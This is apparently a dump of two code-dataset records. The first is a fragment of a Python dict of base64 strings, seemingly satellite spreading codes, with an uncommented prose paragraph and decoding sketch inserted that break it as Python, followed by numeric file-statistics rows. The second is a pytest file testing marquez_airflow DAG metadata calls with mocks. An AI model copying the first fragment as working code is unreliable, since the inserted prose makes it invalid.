37: "gnm4yweNEqqUH6Bk9ywscnxUWmU7r1wNsfS/GBmu3ErgmluESklpK/NC1j8Ng5xig7ZoZeiNQYWM27cF8VUsUIPZQzuYcj/pFODCOs/BoukSGrLL/UdHQmin4IlMnfiuTeNopOu3zpqCr9/lb1cCLeuPnO5KH37wGGXH0CyawxJRl9BzZmNVwFJHt8/bz9N8IyI44V3t4HNPvV/JXLQl/kdPBfU+C7ZLznKhulg+vXDCxF/Ig7YwyGAW3IlctcZLE0pak0VUk5UP9Sl2IGit9b8whjeVg4Ba/3FFvrmwmu+ALWOpaq5LwUhwJGXYk2iuVPZRfESuVXt0pqg7MykkxDNjo+k+IDXBxHBgEQQmU8x6b0HaLt6rrDrjaY7BjX4IHy/3DzJbNuXDxGuNadKlrFyOb28yX5kXvEzMsD1RDEzvO+fgNWuxaPV83alAHbE444jTBz0uErGzAJcvFrKkHeqaO8CEHJzXVGBiUllYr4IManjamxcSugwLN5qCGkXOl7jabtg8h34aankjcOXWOWzxvUTUtpd77V/qhMCKREIrodySuic2i2NN7dGYMToG7uPd2eHJDElVtM2lmZvkbZ5rPsqcAidELVrC0XjtnKl+KG1Y+xkQgDGBOa5DMvTuX9B3Vhuy/Fo19UhUQ0D75hdgG7fzWFXtsUc4K9Ita4/ISZW/YNBdmNfRCfh6Tf7BN5MHmGUIu5Db3yn7sZ2lUsj0HCiHHdQAdXawFX5b+hO8HH9pR2PD22H9AgMtMaO+cWI0HH0NSpauVhJYZQkFYNn4JhHv80oINaE2Xj+rK4Av3zWGgdf/8bfho4Zw8VNa8NGDHNTKGsoc7ujYsVizAA",
38: "3Pixt+Z0UiQZYn1a1K6/bGRH+dOKS/KcEtvAfcIYUjKx0L1xiY97CK2NolF1JKWX7619MxvkZhlo4fjEP9KglLQr41ASj8TBxKQoy/iIrjnhKUY6IXf8He8q+mLJX5Ca4X3PQDIynziq4pqxP+vTj9PaIIyzlb1HbzO9jC/Kt/HSRQsAKmFU4RCqL7uyw3lTFpDBETxRy11BdfppJVMMDohTYGCShnC/+N35AVT2DSYV5+h9YiTBkBU/7uBDTGlJ2C7fYzeA+Cg2mT5Ng5tAA3Lq6Y6+ITSa0kVyiXemx4s1hGd2mvm+8BaKcSawADMdKO0TFq9+55gnjryteEen1yxoZ520gTz2enr7ujzdooWp4oTSfSY9IjRdsi0DNKqmMP+IWXR0rIZ7Df1DpHxGEnDv6gnJccAA7DU+1aQIyfRCzjL7AYGhil1dcqW/Yh/sI72utgZJvjMJuKIIphspUS2CPFoGbkst/Mb1P6L+S74UtjqeA2in4j/qQJqTCh+j7UHc4q+VPuBue8XrPvTkecwUT2+OoSOOx7DuAhb2znURC9xLgiSwhGbF/YsPvXy1Ldn5KjrPmu0fJlppBoM3Tt7bG9uM6fb7ucixLXwuSrpcSO5rFJG+Zr0aSFy/B+65MqDMJEguON1YqaIM47IltNHmZpVBj/IO0vYJhSPOzga1YV20raDfmZ1xejIpiVqewCiANdLLUwfVubJ2Ut0uvezoUxB0uCjGvhUkKyxBZ0z1vvmxsuXgXdk/OYc33R5rrSCmVSx8XDdqkqievVoR9Kzk3KOSXbXb37HMD/fRIH0PXAV5s5oyiZoFxKfF5iQENNAXRBy3AxAd44YhIsnkQA",
39: "3V9dKaht3LoJzDc/EcFHR9EsAZdOdMx8Br3c1fLUUlb9aWTZMoe43L5BTXTG75jxzXIRHcMoFeA+E7K2+FeF5YcSZL6tb4uq/8l+dlDsGHvsv/WZJSWKhKZxeRwzYZ/pg+xYaP5cN32RxpC++snxmuH9m1xOLg0MUqKvP2McWoC/3cFurn7XP2aml5Ho3SgVhI1r2050fW3Aj6a2BodsPRp6yeNE3gJ0QIHgwMtSKwkUOfYmPUDn26oVnTG/SbqtlLuXTCc+A35J72gmyOEUK3aKLmBvOnYgRSMCSw1r6bOhkDKluHdZDi7f69iAuufiLkOYVdKwIXl0ptfG+Aw7DSMu1Jb5MeXoSj/2utGrWB7pcj3XDAp5TCUoHMVSB+4x00yRoaS3TXNqCFnmKyWpPbOZmNJqHqs+QUPwG2ZIWBg/IyOKJu4gR/0fv1Js1uPLYBeCDo+DSVtN2TuNcN/xwGr8rxHoHpBLN/cXqY3jVNRUZXQbobT4typhJYKiofLkCgVyfhRyOBUhKPA/4PE61LPNsmmczM/S/8LWUJwB/UuOevQtPy3C9/D8YjCDa8JmHxHOeDjWNtepMcYuiR8jo3/HZCvJRDi+s0worm8ADBwzTEHVwOKfnaHA/LX4+vd/eGhBcKJpYgFehnYfF65dYhs1yNkuqmuujBows1Y4a5lpOnJbq8NXTiZeSwgZUCuIZiDU0Q3kPs0wDLu1zulvXK4FZ7+hHkrIzBKIoakOaxkcsShALGsJqBiZF65J0Ur1T3qpMU8EI2Sdx6V15zHICZreKrPurh+PTMZ3+SC2ZK9JFVgkwIpUTaMXnENtUlNvwLGGtSEvs2qyl2XMpr/VwA",
40: "h/D3HgkKUjoFeVuzlGquciXUEjUw/kkwugVwxRSVxujGdK1ooLH530cMdS+JdnczIpnXh19JaYIFEhYfzT5hg6uW4pbdWN0G89n8KNk0VF5d5uZn5B0jOD9o+u+xMTnRgiqxpQcI5FmOC4d9COAEp1x1Jo/KCLrFFTLzMyzORd6B8RLNB+0nfRQHqr/6hSohvBsR/PkGyKJM4QHgSGBiee9s/f9zxuac9sJsT8w97OIy+pkAtdFq+edvVPNXGFg/dGzjrNDZ3Nw0lcY8+rstj9FYRdf6G+Ph4EtAP1Vy90XudLDj1ukS7HyfpGWxT9HN3KxtNdyvCavLt4t3UrFzggRtlOrU7vxW+guS3itpCAHBYRe4oXctljThOrAxT/8gnb2qF79RL+a7t0VkG/h5nB6nRSZKLprz9eoo8BRJ4tZWeFE4BqPNGYyskZlxL7V33lN2vjdQCFR9TRQ7TH2HcFYE3xM17xICnLVNBmkqju9dUZqW9qRIsy1mPqu8buYAJEE3hH82fBLCReBvPZY9AM7gOjCO2grQcuRfeH9N+UWwEddoAaVZn96VTiV8+5k+LhWoMjNw5kJKgmaOTrCAcI+yOUFurj0jU1UZhJioyjxjCoZFA3Ft6UKTe0YrgM0vbG4ClM1wjoXznSU3f/Y8QxR2KYdsYZLqHDSs5SDX+3GtA3FmQc+QEgZJEJYSWw4zJS5xcr5u37WD5gNPOnL9AdnI0JH3i+SXVXemAGEorq6NvX5a2Xp9739RlCKALi6aXLgMfoccrYV5pmkbRGYHhI1I6Vg/80Hpts1dShKMzfU06WZuTruSnuzcwDQIpflSdrZcCZYsKh3CWFthfFJ/AA",
41: "gqbI6ZORzO2oNZ8tyYCoRLJr7GDHMSy1QMMZZDPAXdu9K21DzYnZEZW5rlC1OCJppQtj7I08MjVO2/IsSYjOZudsxj2Xye7xXB8HFANazHD4CbuCrA4zxH9nK9VLEz4WDsXAs4V6af/LAJaGUEVdfZmmickHGSndvBxVJiMYfW9afx5+ekyuBXHb7gyhEgGE5UXc5UIWIifkhTRPwS+xCFDfBAtd5bXX/0WkFOHkvGGui+aVy4BbD7hI05sSphQopT1fYQ301iEB0i5L39GspbBramclNkgS+WPIEwChlBSsmMcEPD2W/thXegafy7LKzKDKKyhTeDT6tTiHytLJvBB2GhMsEokwEvSGcf4ocCSXvCo5o6W8DoZqc+U/4vuQ8XSaMFC5VU7UmbzyedxCfOZJn63VqmTFlk5MZ2+XSZJxRSROjMGnG8z0u2I2a8nNLbdtLj+0pWrU50zcSCR6MBTP03ay5lAyXL18btAWpJQer3H9uRwoCengGnKMn0iFG7xOrauyP7MJTPadCBRrIwURbWilkd8RNi4i1TcyPQv5DdoAtrq3sKIA/9e9CuKxK5qZ1YHL9D+esGqL9ZiFo2yxEtofeNJROzE5UQiKavoiVbb6abQM2ci/4L24N8+VUET6Vh+zAw+m4E/N/is9qtpbxPd/cceANSzHqn0FH2Y6E8RcZEM4MjNvCprHimLAB3d1RIm2JT76dext6vKp6vifzfooqp1D454l/A/T25QvdWxdO7Q373yavzD7TaInv/Ah4c94P/G4vHvi/2VT/IT7mpPhXLjgfVA9HP0AtNgVS8sHXsEAzGNbZhXfX6VY9NWODqmCALl8nOscgMqFAA",
42: "6uPHs1c2ihX4ewhy64YZQWkQi7WbS/xsi+BYxX/Od8mVAiZu3S33M13Fuz2ssMCgQr8PRrN3NIf4EbJxA7eR9wmfWPQ/yC5oKqkJ7aap+L5GadMYWnBP2z/Jw+MSYSw6LfQnwSCuO7X+1GNOmOfsnqxmbjF3c/2hcbUuE5M2xwZ1zWX++2gScmwHX8nR+CI1G04iNKdU7Siz+zVBrAwmMGrsk+3s73aa2L0QakhPrFTQrgJ3EdflAJbOJNLdIBXFBhGvTq3/Fr2Lz8e5mJ7BI1+x9+anKveor8vyMhMGcC09roQBJ/MZJtcXZLdxykgsety0V4xaCRncXn8ELOJUmz6j59aPoScWaV92WsKVC6YmAvV5QS1RXCTX3Knma2rxILlIY8m3AarXXrOvBL19MvMwlGqtsj9QWVPytTcM3Sd3NsoX4P1EV5NKLOEy+ttqYD0Os3BmKbHrFAf3lMIBiwxwB0vkBhyQnV12CtQv3BAInNlPlPe0ytsiY2NrwpZIhHAt/RenULXBEpoSAxLt3g+kMOKtUTRazF9t8kZ+2hh1ho3j/8mYjxU20BJOzDOeovs8ak2KgXEMvWJjxmF5KKIXKbK5g7724JBM5niQLkHC3ogQ8t0CAhursEbUVZVm4YKwKZdFc/WqA+Bh06kyINYm+2o8PutPTJJoDL4kQHH0qACVjw8woBsC0NHnjtX9iO9Rj/yZA++DgTPMSlaHv6mz9NdNqLC7dK2gXCduZrp27/jSVfZnxPAH9wp2J6tqmkPxhHL7rmmGgeny4rmbj1ANa7VI9cflo+kVqaknr7JAtH3uM3VzFhGTiQUgLNGaS7GEsGiTxaHsPC2kkPCsQA",
43: "gdf9rdoLkVfABFDD2n2uXgy8vO6TA571Z+gZYeEVBnyAvlSDJh3PD94IpcHqOc3ouIwE80Ilt+SrCi3CQacrmicXp1JTIMCO1izW6bjBpOKHsSy+ZQM3bJ78myJnZj5961blW1TS6RYj79wyyB2FPeUecyYLP+Gvjeddip0NQYSWw/jXpzMXlkrf6aDUWl7/24HX19Xb9eLNr4FdS33oeiwo+m2DEfCQnWxv4tBq6n+Y5No1gfDy9H8yhgjm2E6i+fKlpP8SG/jRUiyQ0tXzzvnjeB611OOF6ajFhTCnn+cOE5nv0LpP6TdYumdCKwN6s59N0g+oSNWyVVEfL4IMK1sRh1ewnd0mLhANKV5bdBE9Xadf+3BJ5eXTLFw82msrpQP0jIK5WnbZGE7T6RVyImHWofAE2oTdJ0tVaxfNH/sViyLDk8wGp9ZyCr7ghhAhuYJH9KBvwEoozM7+t/vOgC4INBCmRrKaN7cyuZ4vkMHOvrqCiyrAfoqpwyA42MfHzYJOzryDTa7EyA0wMynV9Tiey0WZOA6mjuXVYB6yEtTtMnt1xAfzoMDntXggQZ83cojU8E9OU0WJMaUb6qh803JeaVjwPKnmx7hZjkRfTOKDeaduoAbfdz7KIslZdQGlsctQnAQNk3WpZre8Nc9cV1pESfGjB+TOZL8BVmp9TO1bpBBoe0Pj01Uh0DBUw3sefRTmZMVELhEA+Nt0dycOOfswvklf4lTP8+LD/xM4SL11hG6qQSd5rRyEVael8clRIwgm3YAWXE60uogm4JurRGyraUk5dNeojDFSpNJeFUDHFuZppbDXCx7liDbYwPQxmB8Bm2tnJPS3/RcIbYHkgA",
44: "tngUyYUUpFHtj/TI+nAZDWCHgJMB641dF7pYe9uVTWMZB3eWlyjGJbERohbFYeeWvpiG7esADHJ3CRURaeqOxnzpl/dI22COLWExQKeHtXnjGl+ekplKPJ3CHLqRqmtnQuAzKpxTjTZt8hGnIZhkU0Oc8bqNSdlAoqBCk5J7EJTMnuHjPLznZ4pnbjP3zV3o2T0cDVr5u51velH/nsVrgNgyCP5xsMhfO/pg7QE7oBkeB9KxWu9CanEi0+dUrnSeF+bbQ8dypx1+12Rf8kdg+D8q1kSKehTCokcgMro2syOMWqvq3vYkDL5oYGlUtgBR05OjuwFLDVOGCXoCOZ5b44ZmcIaxVB2TnvZ2ILbYPrAExscfvG6z2o7C5QprBde9TNpSz0Qa4DLmk8PCl+DDUM/pWVHa8uHlawTCMrR2Wi0LTlJkuluLSjVj7+wJi58Bp6u1xvFGuCjke6y+QRfKzfKyyILAH3h/UqMEdoge8DpH3WP5iATNi/indUn0z4k7HlzuTyp4Q614FFrz8Ybdfw7fy1rQTVmAlaNXy3/PEP726biR0a+YgDpdy2iuxJS2hAVME8juQpRYoOkKEm7II8ArfnUJ9fNExnm2cLaefSkKeFPr35MEpm56+koW+kEvP/gQu6mnXaGj4++LuuoIC3bVyTUTJJcRLjZQFVSwF3lX1f+IZYFxVMEd759C7QQBvmXgYBg3d3lrKeFj20uACodAUuKDmsl5cM04rfiDTFb6eN6TajZrkx3egZkqwajtXdVM5/zY91eMxyXd5MitzNs9rth2lG0WYQfwiMW0ivCPz9QZpKDgudu8Oko71MVxlli/KL220DboLQLvmCIggA",
45: "6rq/8w78auLmOn9Hu8Ryi5hvZkY9N4HJe8+hxjCPG/ekeGCkGwYB41xJzHLHwQadq/LQ+i3oj4P++jacRHrDFIOJDqqps/4yHK00IdjbmsMFECqTk4SAmEgrqQfoFrpr+8OG2ZGR345N50kZ2tiyejA9TzRJlSVOA2w7f97b8XGbttSKOFsFWGfvPZtMENnxoIVYr9et0STDGuk4fvcrOuIszZG4lk295x4ULTmbng/uu4aiGdbgQnhqFXP0leVGlAGWHpr0jKwxxVVht1voMkX3ylbt5orSqcs8BPkgZSbYhuLkWriAZygwnRPCOi+NFdKR3PfwqE0RMBmZ4MVFoGpWKEe/F5/D+0BAHI0g1Hm6iaWVxsz1keCCikV7s9wO3mZItRZ4hYLlXCLY+KhM5M3jx0nP9/j4VAyooqG0cv4UkxPcX073ZH1SKM8TzIQUtvu19a9pFz0w5M+QMQp/IHDgpq6KQl+jgbgzPu3EWzuIeprWh+P9WpQTpovcFEGT2asPGhApmsApDHUypbYbuO+h5I8YisiDByr9paTg1JTnzPkA/HURUWkaBtKUhvLLmErQeJEMbTm/91xfSBwVcz+g7+0pJ4vgUXqiUkD4xzagTxH/aKEHfDblSwyiYXIR27WoGSkMJiTWy3eHZ2VP9hxLggzalPTH9Z9hLWvjv9ERlWDIcV+lCwpeuSGui54Vvl9pA9extgdXXaksqTsziJFtmEM1HzPpe1663Esw/8iFLdbqsPYzUup1czNevcwx+rXNmI8/jWK14yuO2oG6tlZGFYulf6NyN/V1wQFFDCI6c0zcEyYsT9TokUUZ+upZn13ToXxEcnqN4iMgsvkfQA",
46: "mYAx7gOvE+c6mDJCz4ECc36qBPXEdf6U7e5nVwwXlJECZvCW8ksCocnaM7fAdEKkn71r3LWFVmVVKcsbQFbBWa0djSwOmGHd94rf9oqPw1obx5jBJGxbFbHpgg8flg0kAXJQsHgUgBJ3M/8bZ/wwps66jGao2/Ce0iJawlp5DxCAeRqT1zzheToOQHDjJugHHx5cPKcPxHUkjdGk9iNBPh32FUEouenO5DYfzCacMqVL37HyrR57vscNtzzycBSCW7Whi/kk0dvdbHySnbzj5G2h+iYCRbrRkqe1anA+wi5R3C9Y0A6ySWOFceLu4e85bATnQNn11EqrsWDvLa+gG3Jaa0VHj7Vcu8JK9OSv/LVnFljbkTtDsTTGiikaTIdsvIEbwF1ossBz3VEMJuSQuerV8FBAHRa6dAXlcNfy3YdIZUkmA5WbV4FTqrR4rE/oheETa2LJR7sMhnxui4ek2cOMFDoTx+O5VNwbZr83FFEvRrbk752+TP31p5J7M6nlbMvVZZFZOQW8x/RBmQEoGxTwHUz1Yzf6kGE4k/Eue6dzHtAWwfvaFLsz5d+53SsXYXM89BcyCx1WjDK397oC61kYOuv1IYxro4lRM+fp6A+NJbsLKucvApTPoxgTiGM2QuSHv9RjHyyB8lk9EBJ3FNJJOGnoGslDKvX+X38bLCrYE6VQKCONLWrZom2f7SBkIU8pTgrzUUU19W9/ZZuBS3rMjX0T7u5Xd8lx2Uxlf4iIjdR4o1ZVMPfd1CMtIaSiXV02IU1oQX+/iT7NRC/2V4sPcC8bwHNJ6HP09VL0iSa6xigvzzmYFhA1di84yTxBCMe6Q9hfdqeHIKXZeGUSgA",
47: "1Y8ZtGnTuBgvnrq6teKzoue7dGAbqkT7t3qt14yTZt3qBPIa0o+w5x3uihadQRFuY/Vt0+0OB/qU3ait7UVJgLuQDo32/+IUCbWC9a/WhLXe9Kh1w+zP0YxLJ6eoDz/WSAvQnHOOAEDCNPofWIHJcOFnAAFpNFxYfSp4F/73HBz58XOSTznz12EHpSY1j8JSClncdT2oq5/nBfM5iIvXl7QzpQcOjjO6DJJZYUt7idafT1QaW/myvPT1hDH+Kw1oCYBMAFxD0zCKlzCLO532/xFQqxcKpUJhwIjCpsbL4m07e2cD46VltNuiGgmBPwwZ7I+AGjTtn5GmEU1GW7fp4E/BWjaWVNFdeOElvPQ+Khb92HU2aAZEj5sQxvF285qbTtJ9Kvj9zKaNqV6WsjQpAtn6egfx0sLq7HuR/zuvIR/GnYxyru9b3HZ+fR3TE5ARCTa+BTXqo3s7LhHv7z/b2j2QqfJkUI97KhctlcPEPvuuCm5wY2G+BEoVc1KnGbJaJmdskWGq5Y6KRSugVhqifdVIZwL+IDGlVmjPLZKpIA0IGS6uZCkSaMPVC1JIo/FxS8s4JaAW9oiMKZjCn4EpymvC1dWzqc6EJfzTnITl8xGr+N/ITvWFQ7P95jMSSzKfBCqjmNk4ZjGkFGTmsyUnQ1w0IASo/XjBdQMeQ3NvBg3PQ97E5ZTxhZkSG+boF7UYqTyAPqoaqAdTDrfidJLuxJRw/krGWDPrTqPujLZKE9GraI+4FgnwaKh2Zp1hjKZjY4cVsvCttdQlTXl/Gdh9uicN7nKrzVxALBdOj4jI2Z7jJ5UtDO8racLRjargMaQuLHeQ9Zp3xYh5vxanIPozQA",
48: "5VtQgIkg8Xj6Pd+CWencaZIdAUlppyVtdEtrVdXZyQAnwtdIrnKWKpRTOMFTcB84AwUL53kXBKD+DDogIfKzOBaUxkqTRO/J7KmN4GIzru08DlwhCGawz2gE01YSKtW38zSPt2SFBIjfqON/cNhtyH3lFQ9AjG6Oa+Dfwtyx53+bYFSLRlegqLf6t3NkgP6IpyuJz276exjb9D5hHKe2EUUXn8YpPaO1NzyC3oLrgO0id1dkJZuL9sxZKLkqA4wo1zt8FG60tcL025FZ7RxfPJnXPskeoi3XiESqYOjxIubsc9JBzq+etI9ZNzUba7B0pD9ye7BVePN8PpYnaa+tieI3vbBsdFNK9bPVzM57cwQNWJ6fmg7A1YpRcGQloCsmN2IO0pxfsaehKxvXmgxCxgvJ+0YgDBlhn1enrhIkj+1ZvVKcu649vcjfQ9j4QspUgktXEsBphSPG8v3Tj5MCbeHkdN92KkHvWCRacKkbayKmv07mzz32OE/C9sxKRi0CWGS+5LpVDbG9lW6FsYlUzIYHURijhL7v3mBjzPS8rMV6iQSUqCUYY/seRk/XEdyxwKXL6UVhmK9LDNlCdu62yWlIuTlDnSWA9eHxpYMEtRXfR++Ai869pTLGfBjVu/fKBxx2FGgShYid3uwJavfBMwg8p4fX89mkcLyBsVHz+hlWgPBnnsaIrO2C1B4+rmIrXz4Ro7iSaHciy+qZoKKMj+xen80HI+uBpD9vZgR/0TbrKU5wXyWoXJWthHAnPcOzz9IpS2kJkVQjbulYjroVrcC6IFkEDJwZSCG8KQ/9rfl/b125+qlZio+zePPEQgCdJ6MPy86ksZ0ZvMFwAO3uQA",
49: "xiv710S9na2+l3z72W5Y+VRdgj22iIsMY0X6bCHVrIP/m+4RByZ58ABBUXdXxHaodqpiKA+Jdt6oIBpzcnGcVFERQ9xjROwFYD0+cM8NUlLVOCbYRET3yJsSpbxDkki/eroFzlV1iBKSQoyDpZeH+BvNLJUnChOuqlGO3r/f55iyj9pQruwIlz/jrDlQdKjTPtC3gZdbvuDbfLbX6mvs40utF+tTimNsLRdOAx220mtMBjMBB4WVO9dzJmQwsSsU0fo8qND/4jzRNbk2iobACtsl2amDF/ChJxt+usq2QJfdQGeYFXYjvkDfjPH4iOEXzoR2xqh47FCDuYIe8KZfpR26/azDR2zLL78fW2ASvFOc+rBsW5DH1cOucBolzoWbCuor0xULUw+tNcUGwySRUuq613cnFVKGQKbfokwZyUWlHE12txFBFqHYL8ngbhxycizSyS8R14ZFc3y2NMODFIw7CFtgdbzq2eaORjbgODwKLa72PLyOHpOnDruEcdldJmPai6W00GH84PFE/RvZ2UVJmGgZq7L8ogriDWui0vEfDBzo0rNamlNB5Qm5J29ZJxkHBj2AVrHvV5PyE2wy0RP2sYYMn8tsaq67fw/5VRmg1pd/ja/hN3AMGbgAano/ZTvW2kU4CopgTTF866nCwmWp29bRjp+EQbwD5Pm/4EqdsM2Bit6Ngxcxqc7PEfRAiG8J04YwYvTZK+AUKIZ2XyZh4wUcWme9NQKyjzYhMOT7bw+/drrdBKRWMYfZJuNrxh2Iql5ooaEnxrIbb99DasxqtWvl7bwhcocoBpYWm68oEO6v54WtBH3ipr8sBg9vwET1wzdxaVMnO+jef+MYQA",
50: "/mLm5VNOPbjseAJwp8M/rcSmEqkbYik7K4mnjOIZavLQxpPqcKLWGoHSleh/6KkwZZr1F85vMR7kI7LxB2VgygtGArBgEU+gDG5oHfap333u65MU4bAivXFNkLq/ai4SYqbwG6ZjyqDO/5d6Fd0+VkqOqzn3L2DvrRjerysXAkQfJiFVs+Y6GalxWnaydqJDR8C95y100O3Cm4wdjukCrTtSldsHSq7wmV8wusP+S6jHN+W8K50fq6XgVDVOR/q3+WDzqTn652tNUllx0Ypdt/UOzpC5q4Nk5baj74dLlhYjdyS4pHPH1QM50LuhfSQa6oXalBxS953K/lLeWmGKOsvC/c4XwOYD99wQtZ4FI1yALZazbJJP9Ux8BBig527nfnDXXBmVwN4iTLZYMwZ3hOhyrDNAopUNrSbx/Dc/cdpNHfYGnBx/X3cjk7/281JFMOaYV+YK//0hPcomFGU8IGTfdiNMi1+hMDywypw1vZ712I4zR3IIIrPAbeRFCYcTORMxMmAtQiiqlggAovWIPNQDJ/nB+CO6Vu2Oy/33z+DSaiG/6eHGqGKYhAtuIzzaTfZSt/BIWUavNJygxnONqx3zJVnX9iPXz3T0iAm5cxqRjCCx8yQvikgS8eVY+N6n5oFi7QAJYWPI/2MX1qGTJvlgY3RFP2G354FvfatFoEyMaHohhCXKyp2UoYW9pLbJt+MOvq5umSpvVZBYewbCtzAk4JxGEEdQtLRGqXG5VoxMKcA2QBzMNqZYDd4uCsxFCdbQ1OHn5gErAUEUh2c93loTS7Imu+HlCPCnzjpgvYXNUozcjS2G4nonR3yD9uGpysCrc6vSXSyoTSa6/iV+QA",
}
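The strings above appear to be standard base64 (note the '+' and '/' characters) with any trailing '=' padding stripped. A minimal sketch of expanding one entry into a chip sequence follows; the 5115-chip length (the 1 ms Galileo E6 primary-code period at 5.115 Mcps) and the MSB-first bit order are assumptions, not taken from this file, and should be checked against the ICD and the recorded-signal comparison mentioned above.

import base64

def e6b_code_chips(prn, n_chips=5115):
    # n_chips=5115 and MSB-first unpacking are assumptions; verify before use.
    s = e6b_strings[prn]
    raw = bytearray(base64.b64decode(s + "=" * (-len(s) % 4)))  # restore padding
    bits = []
    for byte in raw:
        for k in range(7, -1, -1):
            bits.append((byte >> k) & 1)
    return bits[:n_chips]

chips = e6b_code_chips(1)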
| 748.844828
| 862
| 0.958626
| 1,479
| 43,433
| 28.150778
| 0.962137
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.15582
| 0.005134
| 43,433
| 57
| 863
| 761.982456
| 0.80773
| 0.005871
| 0
| 0
| 0
| 0.961538
| 0.989044
| 0.989044
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
d3c41618070da11cc2ea1deeb21f1008af4c8fbb
| 23,987
|
py
|
Python
|
integrations/airflow/tests/test_marquez_dag.py
|
mobuchowski/marquez
|
a1964623e13e95ee98b93517f11cdf116a1d1184
|
[
"Apache-2.0"
] | null | null | null |
integrations/airflow/tests/test_marquez_dag.py
|
mobuchowski/marquez
|
a1964623e13e95ee98b93517f11cdf116a1d1184
|
[
"Apache-2.0"
] | null | null | null |
integrations/airflow/tests/test_marquez_dag.py
|
mobuchowski/marquez
|
a1964623e13e95ee98b93517f11cdf116a1d1184
|
[
"Apache-2.0"
] | null | null | null |
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import pytest
import mock
import logging
from airflow.models import (TaskInstance, DagRun)
from airflow.operators.dummy_operator import DummyOperator
from airflow.utils.decorators import apply_defaults
from airflow.utils.db import provide_session
from airflow.utils.dates import days_ago
from airflow.utils import timezone
from airflow.utils.state import State
from marquez_client.models import JobType, DatasetType
from marquez_airflow.dag import _EXTRACTORS as _DAG_EXTRACTORS
from marquez_airflow import DAG
from marquez_airflow.extractors import (
BaseExtractor, StepMetadata, Source, Dataset
)
from marquez_airflow.models import (
DbTableName,
DbTableSchema,
DbColumn
)
from marquez_airflow.utils import get_location, get_job_name
from uuid import UUID
log = logging.getLogger(__name__)
NO_INPUTS = []
NO_OUTPUTS = []
DEFAULT_DATE = timezone.datetime(2016, 1, 1)
DAG_ID = 'test_dag'
DAG_RUN_ID = 'test_run_id_for_task_completed_and_failed'
DAG_RUN_ARGS = {'external_trigger': False}
# TODO: check with a different namespace and owner
DAG_NAMESPACE = 'default'
DAG_OWNER = 'anonymous'
DAG_DESCRIPTION = \
'A simple DAG to test the marquez.DAG metadata extraction flow.'
DAG_DEFAULT_ARGS = {
'owner': DAG_OWNER,
'depends_on_past': False,
'start_date': days_ago(1),
'email_on_failure': False,
'email_on_retry': False,
'email': ['owner@test.com']
}
TASK_ID_COMPLETED = 'test_task_completed'
TASK_ID_FAILED = 'test_task_failed'
@pytest.fixture
@provide_session
def clear_db_airflow_dags(session=None):
session.query(DagRun).delete()
session.query(TaskInstance).delete()
@provide_session
def test_new_run_id(clear_db_airflow_dags, session=None):
dag = DAG(
DAG_ID,
schedule_interval='@daily',
default_args=DAG_DEFAULT_ARGS,
description=DAG_DESCRIPTION
)
run_id = dag.new_run_id()
assert UUID(run_id).version == 4
# tests a simple workflow with default extraction mechanism
@mock.patch('marquez_airflow.DAG.new_run_id')
@mock.patch('marquez_airflow.marquez.Marquez.get_or_create_marquez_client')
@provide_session
def test_marquez_dag(mock_get_or_create_marquez_client, mock_uuid,
clear_db_airflow_dags, session=None):
dag = DAG(
DAG_ID,
schedule_interval='@daily',
default_args=DAG_DEFAULT_ARGS,
description=DAG_DESCRIPTION
)
# (1) Mock the marquez client method calls
mock_marquez_client = mock.Mock()
mock_get_or_create_marquez_client.return_value = mock_marquez_client
run_id_completed = "my-test_marquez_dag-uuid-completed"
run_id_failed = "my-test_marquez_dag-uuid-failed"
mock_uuid.side_effect = [run_id_completed, run_id_failed]
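# DAG.new_run_id is patched, so these side_effect values are consumed in
# order: first by the task that completes, then by the task that fails.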
# (2) Add task that will be marked as completed
task_will_complete = DummyOperator(
task_id=TASK_ID_COMPLETED,
dag=dag
)
completed_task_location = get_location(task_will_complete.dag.fileloc)
# (3) Add task that will be marked as failed
task_will_fail = DummyOperator(
task_id=TASK_ID_FAILED,
dag=dag
)
failed_task_location = get_location(task_will_fail.dag.fileloc)
# (4) Create DAG run and mark as running
dagrun = dag.create_dagrun(
run_id=DAG_RUN_ID,
execution_date=DEFAULT_DATE,
state=State.RUNNING)
# Assert namespace meta call
mock_marquez_client.create_namespace.assert_called_once_with(DAG_NAMESPACE,
DAG_OWNER)
# Assert source and dataset meta calls
mock_marquez_client.create_source.assert_not_called()
mock_marquez_client.create_dataset.assert_not_called()
# Assert job meta calls
create_job_calls = [
mock.call(
job_name=f"{DAG_ID}.{TASK_ID_COMPLETED}",
job_type=JobType.BATCH,
location=completed_task_location,
input_dataset=None,
output_dataset=None,
context=mock.ANY,
description=DAG_DESCRIPTION,
namespace_name=DAG_NAMESPACE,
run_id=None
),
mock.call(
job_name=f"{DAG_ID}.{TASK_ID_FAILED}",
job_type=JobType.BATCH,
location=failed_task_location,
input_dataset=None,
output_dataset=None,
context=mock.ANY,
description=DAG_DESCRIPTION,
namespace_name=DAG_NAMESPACE,
run_id=None
)
]
log.info(
f"{ [name for name, args, kwargs in mock_marquez_client.mock_calls]}")
mock_marquez_client.create_job.assert_has_calls(create_job_calls)
# Assert job run meta calls
create_job_run_calls = [
mock.call(
job_name=f"{DAG_ID}.{TASK_ID_COMPLETED}",
run_id=mock.ANY,
run_args=DAG_RUN_ARGS,
nominal_start_time=mock.ANY,
nominal_end_time=mock.ANY,
namespace_name=DAG_NAMESPACE
),
mock.call(
job_name=f"{DAG_ID}.{TASK_ID_FAILED}",
run_id=mock.ANY,
run_args=DAG_RUN_ARGS,
nominal_start_time=mock.ANY,
nominal_end_time=mock.ANY,
namespace_name=DAG_NAMESPACE
)
]
mock_marquez_client.create_job_run.assert_has_calls(create_job_run_calls)
# (5) Start task that will be marked as completed
task_will_complete.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE)
# (6) Start task that will be marked as failed
ti1 = TaskInstance(task=task_will_fail, execution_date=DEFAULT_DATE)
